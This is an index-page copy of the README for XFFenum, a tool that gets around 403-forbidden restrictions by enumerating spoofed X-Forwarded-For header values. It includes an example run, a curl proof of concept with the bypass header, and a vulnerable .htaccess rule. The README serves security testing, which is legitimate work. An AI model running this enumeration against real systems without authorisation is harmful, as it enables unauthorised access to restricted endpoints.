Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/vavkamil/XFFenum

X-Forwarded-For [403 forbidden] enumeration
https://github.com/vavkamil/XFFenum

Last synced: 5 days ago
JSON representation

X-Forwarded-For [403 forbidden] enumeration

Awesome Lists containing this project

README

        

# XFFenum

A simple tool to bypass 403 forbidden end-points behind load balancers (Cloudflare) based on X-Forwarded-For header

Based on the [enumXFF](https://github.com/infosec-au/enumXFF) by @infosec_au

### Example

```
vavkamil@localhost:~/XFFenum$ python3 xffenum.py -u https://xss.vavkamil.cz/xff -i 192.168.0.0/16
__ _______ _____
\ \/ / ___| ___|__ _ __ _ _ _ __ ___
\ /| |_ | |_ / _ \ '_ \| | | | '_ ` _ \
/ \| _| | _| __/ | | | |_| | | | | | |
/_/\_\_| |_| \___|_| |_|\__,_|_| |_| |_|
X-Forwarded-For [403 forbidden] enumeration

[i] Using URL: https://xss.vavkamil.cz/xff
[i] Using IP range: 192.168.0.0/16
[i] IP addresses in range: 65536
[i] Iterations required: 13108

673it [00:34, 21.69it/s]

[!] Access granted with 192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41
[!] curl https://xss.vavkamil.cz/xff -H "X-Forwarded-For: 192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41"
```

#### Proof of Concept

```
vavkamil@localhost:~$ curl -i https://xss.vavkamil.cz/xff
HTTP/2 403
date: Wed, 07 Aug 2019 20:02:41 GMT
content-type: text/html; charset=iso-8859-1
set-cookie: __cfduid=d77da0ad10e7a360cce4a28311784c12d1565208161; expires=Thu, 06-Aug-20 20:02:41 GMT; path=/; domain=.vavkamil.cz; HttpOnly; Secure
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
server: cloudflare
cf-ray: 502bd9832d69c2db-FRA

403 Forbidden

Forbidden


You don't have permission to access /xff
on this server.




Apache/2.4.29 (Ubuntu) Server at xss.vavkamil.cz Port 80

```

##### .htaccess

```
Order Deny,Allow
Deny from all
SetEnvIf X-Forwarded-For "192.168.13.37" AllowAccess
Allow from env=AllowAccess
```

### Usage

```
vavkamil@localhost:~/XFFenum$ python3 xffenum.py -h
__ _______ _____
\ \/ / ___| ___|__ _ __ _ _ _ __ ___
\ /| |_ | |_ / _ \ '_ \| | | | '_ ` _ \
/ \| _| | _| __/ | | | |_| | | | | | |
/_/\_\_| |_| \___|_| |_|\__,_|_| |_| |_|
X-Forwarded-For [403 forbidden] enumeration

usage: xffenum.py [-h] -u URL -i IP_RANGE [-t THREADS] [--no-verify-ssl]

X-Forwarded-For [403 forbidden] enumeration

optional arguments:
-h, --help show this help message and exit
-u URL Forbidden URL patch to scan
-i IP_RANGE Signe IP or range to use
-t THREADS number of threads (default: 5)
--no-verify-ssl Ignore any and all SSL errors.

Have a nice day :)
```

## References

https://shubs.io/enumerating-ips-in-x-forwarded-headers-to-bypass-403-restrictions/
https://blog.ircmaxell.com/2012/11/anatomy-of-attack-how-i-hacked.html